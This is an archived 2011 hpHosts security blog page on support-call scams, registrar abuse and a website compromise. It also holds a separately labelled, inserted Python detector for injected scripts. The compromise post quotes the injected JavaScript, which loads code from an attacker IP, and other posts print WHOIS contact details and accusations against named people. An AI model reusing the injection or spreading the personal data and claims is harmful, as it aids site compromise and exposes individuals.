Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday, 30 November 2011

Eset: Support-Scammer Tricks

Having been blogging this topic for quite a while, I figure this might be a good time to highlight some of the snippets of information that people have posted on some of those blogs (anonymized, of course). You might also be interested in a resource page I've started here at AVIEN.

One prospective victim was instructed to connect via the Run window to www.support.me. This turns out to belong to logmein.com, the home of one of the (legitimate) remote access tools used by scammers to "fix" their victim's computer, install "better" antivirus or antispyware, and so on. (ammyy.com is another, apparently more favoured by scammers calling victims in the US.) If anyone goes as far as getting a box like this, it would be interesting to know what code they are instructed to enter, since this may help in tracking scam sites.


Read more

http://blog.eset.com/2011/11/30/support-scammer-tricks

References

PC Support Scam Resources
http://avien.net/blog/?page_id=790

Facebook Likes and cold-call scams
http://blog.eset.com/2011/11/09/facebook-likes-and-cold-call-scams

Microsoft Support Scam (again)
http://isc.sans.org/diary.html?storyid=10912

Info: Telephone scammers still coming to a phone near you!
http://hphosts.blogspot.com/2011/03/info-telephone-scammers-still-coming-to.html

Support Scams: Even More Personal
http://blog.eset.com/2010/12/16/support-scams-even-more-personal

Fake Support: the War Drags On
http://blog.eset.com/2010/11/18/fake-support-the-war-drags-on

Marketing Misusing ESET’s Name
http://blog.eset.com/2010/06/23/marketing-misusing-esets-name

techonsupport.com, click4rescue.com, pcrescueworld.com: SupportOnClick revisited
http://hphosts.blogspot.com/2009/12/techonsupportcom-click4rescuecom.html

SupportOnClick: Phoned by Malwarebytes? BigPond? Anyone else?
http://hphosts.blogspot.com/2009/07/supportonclick-phoned-by-malwarebytes.html

SupportOnClick Update
http://hphosts.blogspot.com/2009/04/supportonclick-update.html

supportonclick.com scamming you by telephone!
http://hphosts.blogspot.com/2009/03/supportonclickcom-scamming-you-by.html

Fake tech support call scam - prefetch virus logmein123.com
http://www.digitaltoast.co.uk/fake-tech-support-call-scam-prefetch-virus-logmein123com

New scam - They call you by phone!
http://www.malwarebytes.org/forums/index.php?showtopic=11156

Staffordshire Council - Telephone computer support warning (PDF)
http://wayback.archive.org/web/*/http://www.staffordshire.gov.uk/NR/rdonlyres/6997DBB0-E31E-4AFB-A886-C9DDEE114204/90090/*

Cold call scam warns of virus infection
http://www.h-online.com/security/Cold-call-scam-warns-of-virus-infection--/news/112893

Scareware scammers adopt cold call tactics
http://www.theregister.co.uk/2009/04/10/supportonclick_scareware_scam

Monday, 21 November 2011

hpHOSTS - UPDATED November 21st, 2011

The hpHOSTS Hosts file has been updated. There is now a total of 216,044 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 21/11/2011 18:30
  2. Last Verified: 21/11/2011 19:00
Download hpHosts now!
http://hosts-file.net/?s=Download

Tuesday, 15 November 2011

up-yours.com - Here we go again

I thought I'd made this clear, but apparently not. I got an e-mail earlier, from a RoadRunner IP (residential US ISP), using an @up-yours.com address.

There are two problems here, however:

1. It's an invalid address, so I can't reply
2. The e-mail houses a childish threat, without actually telling me what I did to deserve it

*********************************************************************
General
*********************************************************************
Ref: PI0076181149255
Reason for message: Feedback Notification
Sent from Server: mysteryfcm.co.uk
Date submitted: 16 November 2011
Time submitted: 00:26:37
Submitted by: 76.181.149.255

*********************************************************************
Details
*********************************************************************
Name: Up yours
E-mail: kiss-my-ass@up-yours.com
How did you find us?: Search engine
... Other: Not provided
Site navigation: Very difficult
Comments:

Your scam is soon to be exposed my friend.

Enjoy...

Sunday, 13 November 2011

Lavasoft gone dodgy?

According to a post at my favorite news site, it looks like Lavasoft's new owners are the infamous chaps behind the well-known "Interactive Brands". Should've seen this coming really, given they de-listed the well-known malware player, WhenU, some time ago - I know that was 6 years ago, but it can't just be a coincidence, especially given who the new owners are.

Anti-spyware company Lavasoft AB is now owned by a set of online entrepreneurs who have been linked with misleading websites.

The Montreal-based entrepreneurs, who purchased the company's assets in January, have previously been accused of selling the free versions of Lavasoft products to unwitting internet users as recently as 2007 via cyber-squatting sites.

Lavasoft, originally based in Sweden, was purchased by an investment fund called Solaria in January, but no other holdings can be found for Solaria. In fact, the only ties that Solaria has are to the founders of Upclick, an affiliate marketing company. The founders of this company have also founded companies that sold online porn, reskinned peer-to-peer filesharing software, and allegedly "skimmed" online sales, charging customers for software that they did not order.


http://www.theregister.co.uk/2011/11/11/lavasoft_has_new_owners/

Friday, 11 November 2011

Internet.bs still not accepting abuse reports

You may remember, in September I blogged about Internet.BS, well known as a bulletproof provider for domain registrations.

Sadly, neither Verisign nor ICANN has done anything, and Internet.bs are still refusing reports (I say refusing because, whilst the error is a 450, they were notified months ago and it's still producing the same error, preventing reports going through), courtesy of the Gmail address their abuse@ address leads to (rinaudo@gmail.com).

Interesting tidbit for those interested - rinaudo@gmail.com has also been seen spamming.

http://www.stopforumspam.com/evidence/2423442 (login required to view it).

hxxp://www.8count.ca/forums//profile.php?mode=viewprofile&u=425970

What is curious is that, looking at kookel.org (which acts as a mirror for various Unix/Linux distributions), Marco Rinaudo seems to want to claim to be located in Panama, but with a US phone number.

Domain ID:D146864410-LROR
Domain Name:KOOKEL.ORG
Created On:24-May-2007 14:30:55 UTC
Last Updated On:25-May-2011 11:00:04 UTC
Expiration Date:24-May-2012 14:30:55 UTC
Sponsoring Registrar:Internet.bs Corp. (R1601-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:eu348378bbfeb655
Registrant Name:Marco Rinaudo
Registrant Street1:Av. El Penon #12
Registrant Street2:
Registrant Street3:
Registrant City:Panama
Registrant State/Province:
Registrant Postal Code:00000
Registrant Country:PA
Registrant Phone:+1.23456789
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:rinaudo@gmail.com
Admin ID:eu348378bbeda205
Admin Name:Marco Rinaudo
Admin Street1:Av. El Penon #12
Admin Street2:
Admin Street3:
Admin City:Panama
Admin State/Province:
Admin Postal Code:00000
Admin Country:PA
Admin Phone:+1.23456789
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:rinaudo@gmail.com
Tech ID:eu348378bbdaad56
Tech Name:Marco Rinaudo
Tech Street1:Av. El Penon #12
Tech Street2:
Tech Street3:
Tech City:Panama
Tech State/Province:
Tech Postal Code:00000
Tech Country:PA
Tech Phone:+1.23456789
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:rinaudo@gmail.com
Name Server:DNS1.GOLDCAKE.COM
Name Server:DNS2.GOLDCAKE.COM
DNSSEC:Unsigned


goldcake.com is also one of Marco's websites:

Date Registered: 2002-9-9
Date Modified: 2011-9-3
Expiry Date: 2012-9-9

DNS1: dns3.goldcake.com
DNS2: dns1.goldcake.com
DNS3: dns2.goldcake.com

Registrant
Marco Rinaudo marco (at) rinaudo dot com
Av. El Penon #12
- Panama
Panama
Tel: +1.6463831418

Administrative Contact
Marco Rinaudo marco (at) rinaudo dot com
Av. El Penon #12
- Panama
Panama
Tel: +1.6463831418

Technical Contact
Marco Rinaudo marco (at) rinaudo dot com
Av. El Penon #12
- Panama
Panama
Tel: +1.6463831418

Registrar: Internet.bs Corp.


References

Dear Internet.BS
hphosts.blogspot.com/2011/09/dear-internetbs.html

Wednesday, 9 November 2011

Facebook Likes and cold-call scams

Following an article I wrote recently for SC Magazine, Martijn Grooten of Virus Bulletin, who shares my interest in and dislike of support desk scams, contacted me about the web site associated with eFIX, a company claiming to offer online technical support. He and I, along with Steven Burn, who has a great deal of experience of working in this area, have been able to dig out some interesting info on a slightly different aspect of flaky support desk operations.

eFIX’s web page lists an office in Glasgow under the name eFIX Ltd, at 8901 Marmora Road, Glasgow, D04 89GR. However, a search at Companies House, while it did turn up several entries with somewhat similar names, didn’t find one in Glasgow, and the address doesn’t ring true. The postcode is a fake, and we can’t find a Marmora road in Glasgow (let alone one long enough to hold nearly 9000 street addresses). In fact, the same address turns up in a great many other contexts (design consultancies, music, accountancy, even a buffet service), suggesting the use of some kind of template/boilerplate. It also suggests that it’s not only PC support companies that are suspiciously shy about their real whereabouts. Or else 8901 must be an awfully big building. Of course, it could be an accommodation address for multiple businesses, but that doesn’t explain why the street address itself is so elusive.


http://blog.eset.com/2011/11/09/facebook-likes-and-cold-call-scams

Tuesday, 1 November 2011

webhosting.info compromised

Look at the image on the left. See anything that shouldn't be there?

I'll give you a hint - it's got a black background.

I identified this whilst doing a routine enquiry on an IP housing a plethora of fake meds sites. I dropped a note to the site's owner and registrar, who informed me it most definitely should NOT be there.

The content in question is:

<script type="text/javascript" src="http://122.182.1.154/ghost/ghost.js"></script>
<script>
infoServer="http://122.182.1.154/ghost/infoServer.php";
ghostServer="http://122.182.1.154/ghost/click.php";
initGhost() ;
</script>
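A defender's check for the kind of injection shown above, added here as an example (it is not code from the hpHosts blog or from webhosting.info): it parses a page's HTML and flags every script tag sourced from a bare IP address or from a host other than the site's own, plus inline scripts that reference bare-IP URLs. The sample page is constructed for illustration and embeds the snippet quoted above; the site host name webhosting.info is taken from the post, and the legitimate-looking /js/site.js include is an assumption.

```python
"""Flag externally-sourced <script> tags in an HTML document.

Added example for this post; not code from the hpHosts blog or from
webhosting.info. SAMPLE_HTML is constructed for illustration and embeds
the injected snippet quoted in the post; /js/site.js is an assumed
same-origin include.
"""
import re
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample page: one same-origin include plus the injected content.
SAMPLE_HTML = """<html><head><title>webhosting.info</title>
<script type="text/javascript" src="/js/site.js"></script>
</head><body>
<p>Domain statistics</p>
<script type="text/javascript" src="http://122.182.1.154/ghost/ghost.js"></script>
<script>
infoServer="http://122.182.1.154/ghost/infoServer.php";
ghostServer="http://122.182.1.154/ghost/click.php";
initGhost() ;
</script>
</body></html>"""

URL_RE = re.compile(r'https?://[^\s"\'<>]+')


class ScriptCollector(HTMLParser):
    """Collect every <script> tag: its src attribute (if any) and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # each entry: {"src": str or None, "body": str}
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA, so the body arrives here.
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


def is_bare_ip(host):
    """True when the host part of a URL is a literal IPv4/IPv6 address."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def find_suspicious_scripts(html, site_host):
    """Return a list of (kind, url) findings for a page served from site_host.

    kinds: 'external-ip-src'  - script src points at a bare IP address
           'offsite-src'      - script src points at a different host name
           'inline-ip-url'    - inline script body contains a bare-IP URL
    Relative src values are same-origin and are not reported.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for script in parser.scripts:
        if script["src"]:
            host = urlparse(script["src"]).hostname
            if host is None:
                continue                       # relative path: same origin
            if is_bare_ip(host):
                findings.append(("external-ip-src", script["src"]))
            elif host.lower() != site_host.lower():
                findings.append(("offsite-src", script["src"]))
        else:
            for url in URL_RE.findall(script["body"]):
                if is_bare_ip(urlparse(url).hostname or ""):
                    findings.append(("inline-ip-url", url))
    return findings


if __name__ == "__main__":
    for kind, url in find_suspicious_scripts(SAMPLE_HTML, "webhosting.info"):
        print(f"{kind:16} {url}")
```

Run against the sample, the check reports the ghost.js include and both bare-IP URLs in the inline block while ignoring the same-origin include. Bare-IP script sources are a useful triage signal precisely because legitimate third-party scripts are almost always served from a named host; a site's own content inventory (which hosts it is expected to load from) is what turns the off-site finding into a decision.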


The IP (122.182.1.154) belongs to an Airtel customer, TELEMEDIA SERVICES:

inetnum: 122.182.0.0 - 122.182.127.255
netname: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: India
descr: Contact Person: Manas Kaul
descr: Email: dsl.nocmumbai@airtel.in
descr: Phone:022-40034191
descr: Date of allocation:22-Dec-08
admin-c: MUM1-AP
tech-c: MUM1-AP
country: IN
mnt-by: MAINT-IN-BBIL
mnt-lower: MAINT-IN-TELEMEDIA
mnt-routes: MAINT-IN-TELEMEDIA
status: ALLOCATED NON-PORTABLE
changed: dsl.nocmumbai@airtel.in 20081229
source: APNIC

route: 122.182.1.0/24
descr: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: INDIA
country: IN
origin: AS24560
mnt-by: MAINT-IN-TELEMEDIA
changed: dsl.nocmumbai@airtel.in 20090331
source: APNIC

route: 122.182.1.0/24
descr: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: INDIA
country: IN
origin: AS45514
mnt-by: MAINT-IN-TELEMEDIA
changed: dsl.nocmumbai@airtel.in 20081229
source: APNIC

person: Network Administrator for ABTS MUM
address: ABTS
address: 6th Floor, Interface, Bldg No 7, Link Road,Malad (W),
address: Mumbai,Maharashtra
country: IN
phone: +91-9967667198
e-mail: manas.kaul@airtel.in
nic-hdl: MUM1-AP
remarks: -----------------------------
remarks: Send abuse reports to
remarks: manas.kaul@airtel.in
remarks: -----------------------------
mnt-by: MAINT-IN-TELEMEDIA
changed: manas.kaul@airtel.in 20080725
source: APNIC


The script itself loads content that leads to search.keywordblocks.com (aka searchwe.com), which then leads unsuspecting victims to counterfeit sites such as jewelly.co.uk.

The webhosting.info server admin has been notified by the registrar, so it should be cleaned up and secured shortly.